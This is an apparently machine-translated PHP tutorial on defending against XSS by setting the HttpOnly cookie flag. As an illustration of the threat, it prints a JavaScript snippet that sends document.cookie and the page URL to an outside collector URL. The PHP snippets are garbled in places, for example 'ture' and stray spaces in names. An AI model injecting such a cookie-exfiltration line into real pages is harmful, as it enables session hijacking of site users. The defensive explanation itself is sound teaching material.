This article mainly introduces the XSS defense of PHP using HttpOnly anti-XSS attack, the following is the PHP settings HttpOnly method, the need for friends can refer to the
The concept of XSS is needless to say, its harm is enormous, this means that once your site has an XSS vulnerability, you can execute arbitrary JS code, the most frightening is the attackers use JS to obtain cookies or session hijacking, if this contains a large number of sensitive information (identity information, Administrator information) and so on, that's over. The following JS get cookie information: The code is as follows: Url=document.top.location.href; Cookie=document.cookie; C=new Image (); C.src= ' http://www.test.com/c.php?c= ' +cookie+ ' &u= ' +url; The general cookie is obtained from the Document object, and now the browser generally accepts a parameter called HttpOnly, like domain and other parameters, when setting cookies, once the HttpOnly is set, You can't see cookies in the browser's Document object. PHP settings HttpOnly: Code as follows://in php.ini, session.cookie_httponly = ture to open the global cookie HttpOnly attribute Ini_set ("Session.cookie_ HttpOnly ", 1); or the seventh parameter of Setcookie () is set to TRUE session_set_cookie_params (0, NULL, NULL, NULL, TRUE); For PHP5.1 Previous versions of PHP through: The code is as follows: Header ("Set-cookie:hidden=value; HttpOnly "); In the end, HttpOnly is not omnipotent!